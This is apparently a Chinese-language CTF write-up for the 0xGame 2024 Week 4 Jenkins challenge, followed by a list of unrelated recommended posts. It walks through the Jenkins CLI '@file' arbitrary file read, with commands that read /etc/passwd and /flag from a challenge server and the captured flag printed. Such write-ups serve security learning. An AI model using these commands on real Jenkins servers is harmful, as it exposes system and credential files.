0xGame 2024 [Week 4] Jenkins

1.前言

由于好久没做web题了,所以今天来尝试来做一波web题,仅供刷题记录。

2.题目

这个给的提示对于小白来说实在是友好的过劲。

3.分析

上网搜到一个关于Jenkins的历史漏洞,下面链接可供参考

https://blog.csdn.net/2301_80127209/article/details/139777834https://blog.csdn.net/2301_80127209/article/details/139777834

打开页面

利用框架漏洞 ,路径后进行添加 /jnlpJars/jenkins-cli.jar,下载下来文件

进行读取文件 ,这里我把下载下来的文件放在了z盘,大家要根据其文件实际位置进行操作

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http who-am-i "@/etc/passwd"

成功实现任意文件读取功能 ,但只是显示了一部分

尝试目标是否开启了"匿名用户可读"选项,开启了话则可以显示全部命令,当然这一步也可省略,但是我们可以测试一波也花不了多长时间

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http connect-node "@/etc/passwd"

这时候我们可以尝试读取flag内容了,根据做题经验,猜测flag在根目录下

java -jar jenkins-cli.jar -s http://8.130.84.100:8080/ -http connect-node "@/flag"

成功获取到flag

4.答案

0xgame{2a6d2b88-7d12-4b66-901d-5ed489e9a322}
相关推荐
运维老司机1 分钟前
Jenkins修改LOGO
运维·自动化·jenkins
大数据编程之光16 分钟前
Flink Standalone集群模式安装部署全攻略
java·大数据·开发语言·面试·flink
爪哇学长30 分钟前
双指针算法详解:原理、应用场景及代码示例
java·数据结构·算法
ExiFengs33 分钟前
实际项目Java1.8流处理, Optional常见用法
java·开发语言·spring
paj12345678935 分钟前
JDK1.8新增特性
java·开发语言
繁依Fanyi1 小时前
简易安卓句分器实现
java·服务器·开发语言·算法·eclipse
慧都小妮子1 小时前
Spire.PDF for .NET【页面设置】演示:打开 PDF 时自动显示书签或缩略图
java·pdf·.net
m51271 小时前
LinuxC语言
java·服务器·前端
IU宝1 小时前
C/C++内存管理
java·c语言·c++
瓜牛_gn1 小时前
依赖注入注解
java·后端·spring